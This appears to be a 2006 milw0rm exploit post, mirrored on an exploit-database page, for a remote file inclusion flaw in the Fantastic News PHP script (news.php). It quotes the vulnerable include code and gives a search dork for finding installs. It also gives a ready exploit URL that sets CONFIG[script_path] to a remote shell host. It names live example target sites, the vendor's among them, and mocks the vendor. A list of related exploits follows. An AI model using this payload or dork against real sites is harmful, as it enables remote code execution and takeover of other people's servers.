#============================================================================================== #Fantastic News <= v2.1.3 (CONFIG[script_path]) Remote File Inclusion Exploit #=============================================================================================== # #Critical Level : Dangerous # #Venedor site : http://fscripts.com/ # #Version : v2.1.2 & v2.1.3 # #================================================================================================ # #Dork : "Powered by Fantastic News v2.1.2" or "Powered by Fantastic News v2.1.3" # #================================================================================================ # #Bug in : news.php # #Vlu Code : #-------------------------------- # require_once($CONFIG['script_path']."config.php"); # require_once($CONFIG['script_path']."functions/functions.php"); # require_once($CONFIG['script_path']."functions/mysql.php"); # require_once($CONFIG['script_path']."functions/template.php"); # #================================================================================================ # #Exploit : #-------------------------------- # #http://sitename.com/[Script Path]/news.php?CONFIG[script_path]=http://SHELLURL.COM? # #Example : # http://fscripts.com/ ====> vendor site =)) hahahahaaaaaa ====> 2.1.3 # http://lnx.evanescencewebsite.com/PressArchive =====> 2.1.2 # # # #================================================================================================ #Discoverd By : SHiKaA # #Conatact : SHiKaA-[at]hotmail.com # #GreetZ : Str0ke XoRon Bl@Ck^B1rd AND ALL ccteam (coder-cruze-wolf) ================================================================================================== # milw0rm.com [2006-08-19]
Related Exploits
Trying to match CVEs (1): CVE-2006-4285Trying to match OSVDBs (1): 28031
Other Possible E-DB Search Terms: Fantastic News 2.1.3, Fantastic News
Date | D | V | Title | Author |
---|---|---|---|---|
2006-03-04 |
![]() |
Fantastic News 2.1.2 - 'script_path' Remote Code Execution | uid0 | |
2006-02-27 |
![]() |
Fantastic News 2.1.1 - SQL Injection | SAUDI | |
2006-12-09 |
![]() |
Fantastic News 2.1.4 - 'news.php' SQL Injection | Bl0od3r | |
2006-12-27 |
![]() |
Fantastic News 2.1.4 - Multiple Remote File Inclusions | Mr-m07 | |
2005-11-29 |
![]() |
Fantastic Scripts Fantastic News 2.1.1 - 'news.php' SQL Injection | r0t3d3Vil |